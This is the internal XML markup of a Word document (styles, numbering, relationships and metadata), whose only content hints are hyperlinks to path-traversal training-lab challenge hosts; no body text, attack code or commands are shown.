    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A734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35FF2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B20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66B11"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="977E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580420">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1048064639">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1483623903">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1075207390">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="381752020">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2001081235">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1429885905">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="742217100">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="442113917">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="176387443">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="699087985">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="859854341">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2713266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598"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="000265F6"/>
    <w:rsid w:val="00053D51"/>
    <w:rsid w:val="000763AA"/>
    <w:rsid w:val="000A0F15"/>
    <w:rsid w:val="00102585"/>
    <w:rsid w:val="00117F3A"/>
    <w:rsid w:val="00121B5F"/>
    <w:rsid w:val="00127EDF"/>
    <w:rsid w:val="001325F6"/>
    <w:rsid w:val="0017615F"/>
    <w:rsid w:val="001840D4"/>
    <w:rsid w:val="001B0CAB"/>
    <w:rsid w:val="001B67AD"/>
    <w:rsid w:val="001E64B6"/>
    <w:rsid w:val="00205544"/>
    <w:rsid w:val="002211DC"/>
    <w:rsid w:val="002932D2"/>
    <w:rsid w:val="00294628"/>
    <w:rsid w:val="002D587E"/>
    <w:rsid w:val="002D75E5"/>
    <w:rsid w:val="00330A40"/>
    <w:rsid w:val="0035108B"/>
    <w:rsid w:val="00361D31"/>
    <w:rsid w:val="00362E10"/>
    <w:rsid w:val="00386F0D"/>
    <w:rsid w:val="003953E4"/>
    <w:rsid w:val="003A30C7"/>
    <w:rsid w:val="003C75D5"/>
    <w:rsid w:val="003D3FED"/>
    <w:rsid w:val="00431E62"/>
    <w:rsid w:val="0043616B"/>
    <w:rsid w:val="004416F6"/>
    <w:rsid w:val="004535F1"/>
    <w:rsid w:val="00466ECA"/>
    <w:rsid w:val="00494F1D"/>
    <w:rsid w:val="004E29E2"/>
    <w:rsid w:val="004F0B2A"/>
    <w:rsid w:val="004F4982"/>
    <w:rsid w:val="004F5DC8"/>
    <w:rsid w:val="005110B1"/>
    <w:rsid w:val="00520431"/>
    <w:rsid w:val="00564938"/>
    <w:rsid w:val="00586CD4"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="005C0701"/>
    <w:rsid w:val="005D19F1"/>
    <w:rsid w:val="005D1A6C"/>
    <w:rsid w:val="005D25EF"/>
    <w:rsid w:val="00612794"/>
    <w:rsid w:val="00623959"/>
    <w:rsid w:val="00652E37"/>
    <w:rsid w:val="00674217"/>
    <w:rsid w:val="006C2EA0"/>
    <w:rsid w:val="006C3F57"/>
    <w:rsid w:val="006E703C"/>
    <w:rsid w:val="0071536D"/>
    <w:rsid w:val="0075033D"/>
    <w:rsid w:val="007510EB"/>
    <w:rsid w:val="007569DC"/>
    <w:rsid w:val="007D020B"/>
    <w:rsid w:val="007F2B73"/>
    <w:rsid w:val="00830CEE"/>
    <w:rsid w:val="008438A8"/>
    <w:rsid w:val="00867EF9"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="008B6964"/>
    <w:rsid w:val="008C1D41"/>
    <w:rsid w:val="008C5F02"/>
    <w:rsid w:val="008D7694"/>
    <w:rsid w:val="00900DB1"/>
    <w:rsid w:val="009011D5"/>
    <w:rsid w:val="00914607"/>
    <w:rsid w:val="00917FED"/>
    <w:rsid w:val="00941626"/>
    <w:rsid w:val="00966CCF"/>
    <w:rsid w:val="009A3CBF"/>
    <w:rsid w:val="009B6B93"/>
    <w:rsid w:val="009C1A0C"/>
    <w:rsid w:val="009D2888"/>
    <w:rsid w:val="009E7598"/>
    <w:rsid w:val="009F0861"/>
    <w:rsid w:val="00A40D0E"/>
    <w:rsid w:val="00A636E7"/>
    <w:rsid w:val="00A85B87"/>
    <w:rsid w:val="00A96D57"/>
    <w:rsid w:val="00AA6D83"/>
    <w:rsid w:val="00AA78D9"/>
    <w:rsid w:val="00AC03A8"/>
    <w:rsid w:val="00AC0AFB"/>
    <w:rsid w:val="00B107DA"/>
    <w:rsid w:val="00B22111"/>
    <w:rsid w:val="00B246AC"/>
    <w:rsid w:val="00B44CBA"/>
    <w:rsid w:val="00BD2D8C"/>
    <w:rsid w:val="00C17D90"/>
    <w:rsid w:val="00C26E64"/>
    <w:rsid w:val="00C43095"/>
    <w:rsid w:val="00C45D5E"/>
    <w:rsid w:val="00C62C73"/>
    <w:rsid w:val="00C807AC"/>
    <w:rsid w:val="00CD544D"/>
    <w:rsid w:val="00CE05F4"/>
    <w:rsid w:val="00CE2B6C"/>
    <w:rsid w:val="00CE7E8E"/>
    <w:rsid w:val="00D05851"/>
    <w:rsid w:val="00D2441B"/>
    <w:rsid w:val="00D3144A"/>
    <w:rsid w:val="00D5569D"/>
    <w:rsid w:val="00D61149"/>
    <w:rsid w:val="00D851C8"/>
    <w:rsid w:val="00DA6D83"/>
    <w:rsid w:val="00DC28A3"/>
    <w:rsid w:val="00E025C3"/>
    <w:rsid w:val="00E150DF"/>
    <w:rsid w:val="00E20FA3"/>
    <w:rsid w:val="00E40C12"/>
    <w:rsid w:val="00E475A6"/>
    <w:rsid w:val="00E65D83"/>
    <w:rsid w:val="00EA339D"/>
    <w:rsid w:val="00EA65C2"/>
    <w:rsid w:val="00ED0CFF"/>
    <w:rsid w:val="00ED7FF3"/>
    <w:rsid w:val="00EF21FF"/>
    <w:rsid w:val="00F0173B"/>
    <w:rsid w:val="00F0745F"/>
    <w:rsid w:val="00F13951"/>
    <w:rsid w:val="00F14263"/>
    <w:rsid w:val="00F33549"/>
    <w:rsid w:val="00F344F3"/>
    <w:rsid w:val="00F93452"/>
    <w:rsid w:val="00FC27D9"/>
    <w:rsid w:val="00FE70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56D59"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5012B613-F896-430E-B46D-61A45E21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5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5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5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5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5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5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5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5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5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5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598"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009E7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598"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="009E7598"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009E7598"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009E7598"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009E75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598"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009E7598"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E7598"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009E7598"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00494F1D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D058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hyperlink" Target="http://pathtraversal.cyberjutsu-lab.tech:8092/"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hyperlink" Target="http://pathtraversal.cyberjutsu-lab.tech:8091/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pathtraversal.cyberjutsu-lab.tech:8096/"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pathtraversal.cyberjutsu-lab.tech:8095/"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yperlink" Target="http://pathtraversal.cyberjutsu-lab.tech:8094/"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hyperlink" Target="http://pathtraversal.cyberjutsu-lab.tech:8093/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpt.cyberjutsu.io/challenge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1E9E0-8352-4F04-AB67-FC2B15767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2190</TotalTime>
  <Pages>24</Pages>
  <Words>3026</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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-08T03:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-01T15:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>